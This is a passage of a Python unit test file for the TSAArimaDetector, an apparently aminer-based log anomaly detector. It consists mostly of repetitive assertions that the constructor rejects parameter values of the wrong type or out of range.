[self.stream_printer_event_handler], etd, learn_mode=True) self.assertEqual(other.time_window_history, tad.time_window_history) self.assertEqual(other.prediction_history, tad.prediction_history) self.assertEqual(other.time_history, tad.time_history) self.assertEqual(other.result_list, tad.result_list) self.assertEqual(other.time_trigger_list, tad.time_trigger_list) self.assertEqual(other.num_event_lines_ref, tad.num_event_lines_ref) def test4validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, ["default"], etd) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, None, etd) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, "", etd) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, b"Default", etd) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, True, etd) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, 123, etd) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, 123.3, etd) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, {"id": "Default"}, etd) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, (), etd) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, set(), etd) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time="123") 
self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time=100) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, waiting_time=100.22) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, 
num_sections_waiting_time=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time=100) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_sections_waiting_time=100.22) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage=1.1) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage=0) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, acf_pause_interval_percentage=0.5) TSAArimaDetector(self.aminer_config, 
[self.stream_printer_event_handler], etd, acf_pause_interval_percentage=1) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval=b"True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval="True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval=123) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval=123.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval=True) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min=100.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, acf_auto_pause_interval_num_min=100) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values=b"True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values="True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values=123) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values=123.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, 
self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, build_sum_over_values=True) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=100.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=100) self.assertRaises(ValueError, TSAArimaDetector, 
self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step=100.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_division_time_step=100) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=1.1) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha="123") self.assertRaises(TypeError, TSAArimaDetector, 
self.aminer_config, [self.stream_printer_event_handler], etd, alpha={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha=0) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha=0.5) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha=1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=1.1) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=set()) 
TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=0) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=0.5) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=set()) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=0) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=30, num_max_time_history=20) self.assertRaises(TypeError, TSAArimaDetector, 
self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=20, num_max_time_history=100) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=100.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=["Default"]) 
self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=20) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=1.1) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=0) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=0.5) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=1) self.assertRaises(ValueError, 
TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=1.1) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=0) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=0.5) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=1) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=None) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=b"True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, force_period_length="True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=123) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=123.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=True) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=100.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length={"id": "Default"}) self.assertRaises(TypeError, 
TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=100) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step=100.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, min_log_lines_per_time_step=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step=100) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id="") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=None) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=True) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=123) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=123.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id="Default") self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=[""]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, 
target_path_list="") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=True) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=123) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=123.3) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=[]) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=None) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=[""]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list="") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=True) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=123) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=123.3) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, ignore_list={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=[]) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=None) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=None) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=b"True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline="True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=123) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=123.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=True) self.assertRaises(TypeError, TSAArimaDetector, 
